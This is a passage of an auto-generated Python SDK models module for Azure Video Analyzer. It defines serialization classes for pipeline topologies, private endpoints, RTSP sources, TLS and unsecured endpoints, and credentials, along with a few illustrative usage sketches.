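# in this module; VideoSink, UnsecuredEndpoint and UsernamePasswordCredentials
# are assumed to be the module's other generated models, and every name and URL
# below is illustrative.
#
#   topology = PipelineTopology(
#       kind="Live",
#       sku=Sku(name="Live_S1"),
#       parameters=[ParameterDeclaration(name="rtspUrl", type="String")],
#       sources=[RtspSource(
#           name="rtspSource",
#           endpoint=UnsecuredEndpoint(
#               url="${rtspUrl}",
#               credentials=UsernamePasswordCredentials(username="user", password="pass")))],
#       sinks=[VideoSink(
#           name="videoSink",
#           inputs=[NodeInput(node_name="rtspSource")],
#           video_name="lobby-camera")],
#   )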
class PipelineTopologyCollection(msrest.serialization.Model):
"""A collection of PipelineTopology items.
:param value: A collection of PipelineTopology items.
:type value: list[~video_analyzer.models.PipelineTopology]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineTopology]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineTopologyUpdate(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can
be referenced throughout the topology nodes through the use of the "${PARAMETER_NAME}" string
pattern. Parameters can have optional default values and can later be defined in individual
instances of the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyUpdate, self).__init__(**kwargs)
self.kind = kwargs.get('kind', None)
self.sku = kwargs.get('sku', None)
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(Resource):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param private_endpoint: The private endpoint resource.
:type private_endpoint: ~video_analyzer.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~video_analyzer.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~video_analyzer.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.private_endpoint = kwargs.get('private_endpoint', None)
self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None)
self.provisioning_state = None
class PrivateEndpointConnectionListResult(msrest.serialization.Model):
"""List of private endpoint connection associated with the specified storage account.
:param value: Array of private endpoint connections.
:type value: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnectionListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link DNS zone names for the private link resource.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResource, self).__init__(**kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = kwargs.get('required_zone_names', None)
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~video_analyzer.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected".
:type status: str or ~video_analyzer.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.description = kwargs.get('description', None)
self.actions_required = kwargs.get('actions_required', None)
class Properties(msrest.serialization.Model):
"""Metric properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar service_specification: The service specifications.
:vartype service_specification: ~video_analyzer.models.ServiceSpecification
"""
_validation = {
'service_specification': {'readonly': True},
}
_attribute_map = {
'service_specification': {'key': 'serviceSpecification', 'type': 'ServiceSpecification'},
}
def __init__(
self,
**kwargs
):
super(Properties, self).__init__(**kwargs)
self.service_specification = None
class ResourceIdentity(msrest.serialization.Model):
"""The user assigned managed identity to use when accessing a resource.
All required parameters must be populated in order to send to Azure.
:param user_assigned_identity: Required. The user assigned managed identity's resource
identifier to use when accessing a resource.
:type user_assigned_identity: str
"""
_validation = {
'user_assigned_identity': {'required': True},
}
_attribute_map = {
'user_assigned_identity': {'key': 'userAssignedIdentity', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceIdentity, self).__init__(**kwargs)
self.user_assigned_identity = kwargs['user_assigned_identity']
class RsaTokenKey(TokenKey):
"""Required validation properties for tokens generated with RSA algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. RSA algorithm to be used: RS256, RS384 or RS512. Possible values include:
"RS256", "RS384", "RS512".
:type alg: str or ~video_analyzer.models.AccessPolicyRsaAlgo
:param n: Required. RSA public key modulus.
:type n: str
:param e: Required. RSA public key exponent.
:type e: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'n': {'required': True},
'e': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'n': {'key': 'n', 'type': 'str'},
'e': {'key': 'e', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(RsaTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RsaTokenKey' # type: str
self.alg = kwargs['alg']
self.n = kwargs['n']
self.e = kwargs['e']
class SourceNodeBase(NodeBase):
"""Base class for topology source nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: RtspSource, VideoSource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.RtspSource': 'RtspSource', '#Microsoft.VideoAnalyzer.VideoSource': 'VideoSource'}
}
def __init__(
self,
**kwargs
):
super(SourceNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SourceNodeBase' # type: str
class RtspSource(SourceNodeBase):
"""RTSP source allows for media from an RTSP camera or generic RTSP server to be ingested into a pipeline.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param transport: Network transport utilized by the RTSP and RTP exchange: TCP or HTTP. When
using TCP, the RTP packets are interleaved on the TCP RTSP connection. When using HTTP, the
RTSP messages are exchanged through long-lived HTTP connections, and the RTP packets are
interleaved in the HTTP connections alongside the RTSP messages. Possible values include:
"Http", "Tcp".
:type transport: str or ~video_analyzer.models.RtspTransport
:param endpoint: Required. RTSP endpoint information for Video Analyzer to connect to. This
contains the required information for Video Analyzer to connect to RTSP cameras and/or generic
RTSP servers.
:type endpoint: ~video_analyzer.models.EndpointBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'endpoint': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'transport': {'key': 'transport', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'EndpointBase'},
}
def __init__(
self,
**kwargs
):
super(RtspSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RtspSource' # type: str
self.transport = kwargs.get('transport', None)
self.endpoint = kwargs['endpoint']
class TunnelBase(msrest.serialization.Model):
"""Base class for tunnel objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: SecureIotDeviceRemoteTunnel.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel': 'SecureIotDeviceRemoteTunnel'}
}
def __init__(
self,
**kwargs
):
super(TunnelBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class SecureIotDeviceRemoteTunnel(TunnelBase):
"""A remote tunnel securely established using IoT Hub device information.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param iot_hub_name: Required. Name of the IoT Hub.
:type iot_hub_name: str
:param device_id: Required. The IoT device id to use when establishing the remote tunnel. This
string is case-sensitive.
:type device_id: str
"""
_validation = {
'type': {'required': True},
'iot_hub_name': {'required': True},
'device_id': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'iot_hub_name': {'key': 'iotHubName', 'type': 'str'},
'device_id': {'key': 'deviceId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SecureIotDeviceRemoteTunnel, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel' # type: str
self.iot_hub_name = kwargs['iot_hub_name']
self.device_id = kwargs['device_id']
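# Hedged usage sketch (editor's addition): a tunnel is attached to an endpoint
# so the service can reach a camera that is not publicly addressable, relaying
# through the IoT Hub device. The hub and device names are illustrative, and
# UnsecuredEndpoint/UsernamePasswordCredentials are assumed from elsewhere in
# this module.
#
#   endpoint = UnsecuredEndpoint(
#       url="rtsp://localhost:554/stream",
#       credentials=UsernamePasswordCredentials(username="user", password="pass"),
#       tunnel=SecureIotDeviceRemoteTunnel(iot_hub_name="myhub", device_id="camera-01"),
#   )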
class ServiceSpecification(msrest.serialization.Model):
"""The service metric specifications.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar log_specifications: List of log specifications.
:vartype log_specifications: list[~video_analyzer.models.LogSpecification]
:ivar metric_specifications: List of metric specifications.
:vartype metric_specifications: list[~video_analyzer.models.MetricSpecification]
"""
_validation = {
'log_specifications': {'readonly': True},
'metric_specifications': {'readonly': True},
}
_attribute_map = {
'log_specifications': {'key': 'logSpecifications', 'type': '[LogSpecification]'},
'metric_specifications': {'key': 'metricSpecifications', 'type': '[MetricSpecification]'},
}
def __init__(
self,
**kwargs
):
super(ServiceSpecification, self).__init__(**kwargs)
self.log_specifications = None
self.metric_specifications = None
class SinkNodeBase(NodeBase):
"""Base class for topology sink nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSink.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSink': 'VideoSink'}
}
def __init__(
self,
**kwargs
):
super(SinkNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SinkNodeBase' # type: str
self.inputs = kwargs['inputs']
class Sku(msrest.serialization.Model):
"""The SKU details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. The SKU name. Possible values include: "Live_S1", "Batch_S1".
:type name: str or ~video_analyzer.models.SkuName
:ivar tier: The SKU tier. Possible values include: "Standard".
:vartype tier: str or ~video_analyzer.models.SkuTier
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = kwargs['name']
self.tier = None
class StorageAccount(msrest.serialization.Model):
"""The details about the associated storage account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The ID of the storage account resource. Video Analyzer relies on tables,
queues, and blobs. The primary storage account must be a Standard Storage account (either
Microsoft.ClassicStorage or Microsoft.Storage).
:type id: str
:param identity: A managed identity that Video Analyzer will use to access the storage account.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the storage account mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StorageAccount, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs.get('identity', None)
self.status = None
class SystemData(msrest.serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource. Possible values
include: "User", "Application", "ManagedIdentity", "Key".
:type created_by_type: str or ~video_analyzer.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: ~datetime.datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:type last_modified_by_type: str or ~video_analyzer.models.CreatedByType
:param last_modified_at: The timestamp of resource last modification (UTC).
:type last_modified_at: ~datetime.datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(SystemData, self).__init__(**kwargs)
self.created_by = kwargs.get('created_by', None)
self.created_by_type = kwargs.get('created_by_type', None)
self.created_at = kwargs.get('created_at', None)
self.last_modified_by = kwargs.get('last_modified_by', None)
self.last_modified_by_type = kwargs.get('last_modified_by_type', None)
self.last_modified_at = kwargs.get('last_modified_at', None)
class TimeSequenceBase(msrest.serialization.Model):
"""A sequence of datetime ranges as a string.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSequenceAbsoluteTimeMarkers.
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers': 'VideoSequenceAbsoluteTimeMarkers'}
}
def __init__(
self,
**kwargs
):
super(TimeSequenceBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TlsEndpoint(EndpointBase):
"""TLS endpoint describes an endpoint that the pipeline can connect to over TLS transport (data is encrypted in transit).
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
:param trusted_certificates: List of trusted certificate authorities when authenticating a TLS
connection. A null list designates that Azure Video Analyzer's list of trusted authorities
should be used.
:type trusted_certificates: ~video_analyzer.models.CertificateSource
:param validation_options: Validation options to use when authenticating a TLS connection. By
default, strict validation is used.
:type validation_options: ~video_analyzer.models.TlsValidationOptions
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
'trusted_certificates': {'key': 'trustedCertificates', 'type': 'CertificateSource'},
'validation_options': {'key': 'validationOptions', 'type': 'TlsValidationOptions'},
}
def __init__(
self,
**kwargs
):
super(TlsEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.TlsEndpoint' # type: str
self.trusted_certificates = kwargs.get('trusted_certificates', None)
self.validation_options = kwargs.get('validation_options', None)
class TlsValidationOptions(msrest.serialization.Model):
"""Options for controlling the validation of TLS endpoints.
    :param ignore_hostname: When set to 'true', certificate subject name validation is skipped.
     Default is 'false'.
    :type ignore_hostname: str
    :param ignore_signature: When set to 'true', certificate chain trust validation is skipped.
     Default is 'false'.
    :type ignore_signature: str
"""
_attribute_map = {
'ignore_hostname': {'key': 'ignoreHostname', 'type': 'str'},
'ignore_signature': {'key': 'ignoreSignature', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TlsValidationOptions, self).__init__(**kwargs)
self.ignore_hostname = kwargs.get('ignore_hostname', None)
self.ignore_signature = kwargs.get('ignore_signature', None)
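# Illustrative sketch (not part of the generated models): a TLS endpoint with
# relaxed hostname validation, built with the kwargs-based constructors used
# throughout this module. The URL and credential values are hypothetical;
# UsernamePasswordCredentials is defined later in this module, which is fine
# because the reference is only resolved when the function is called.
def _example_tls_endpoint():
    return TlsEndpoint(
        credentials=UsernamePasswordCredentials(username='user', password='secret'),
        url='rtsps://camera.example.com:322/stream',
        # Skip subject name validation only; chain trust is still enforced.
        validation_options=TlsValidationOptions(ignore_hostname='true'),
    )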
class TokenClaim(msrest.serialization.Model):
"""Properties for expected token claims.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the claim which must be present on the token.
:type name: str
:param value: Required. Expected value of the claim to be present on the token.
:type value: str
"""
_validation = {
'name': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TokenClaim, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs['value']
class TrackedResource(Resource):
"""The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TrackedResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.location = kwargs['location']
class UnsecuredEndpoint(EndpointBase):
"""Unsecured endpoint describes an endpoint that the pipeline can connect to over clear transport (no encryption in transit).
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
def __init__(
self,
**kwargs
):
super(UnsecuredEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UnsecuredEndpoint' # type: str
class UserAssignedManagedIdentity(msrest.serialization.Model):
"""The details of the user assigned managed identity used by the Video Analyzer resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar client_id: The client ID.
:vartype client_id: str
:ivar principal_id: The principal ID.
:vartype principal_id: str
"""
_validation = {
'client_id': {'readonly': True},
'principal_id': {'readonly': True},
}
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UserAssignedManagedIdentity, self).__init__(**kwargs)
self.client_id = None
self.principal_id = None
class UsernamePasswordCredentials(CredentialsBase):
"""Username and password credentials.
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param username: Required. Username to be presented as part of the credentials.
:type username: str
    :param password: Required. Password to be presented as part of the credentials. It is
     recommended that this value be parameterized as a secret string to prevent it from being
     returned as part of the resource on API requests.
:type password: str
"""
_validation = {
'type': {'required': True},
'username': {'required': True},
'password': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsernamePasswordCredentials, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UsernamePasswordCredentials' # type: str
self.username = kwargs['username']
self.password = kwargs['password']
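# Illustrative sketch (hypothetical values): an unsecured endpoint paired with
# username/password credentials, mirroring the TLS example earlier in this
# module. Per the docstring above, the password would normally be supplied as
# a parameterized secret rather than a literal.
def _example_unsecured_endpoint():
    creds = UsernamePasswordCredentials(username='user', password='secret')
    return UnsecuredEndpoint(credentials=creds, url='rtsp://camera.local:554/stream')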
class VideoAnalyzer(TrackedResource):
"""The Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
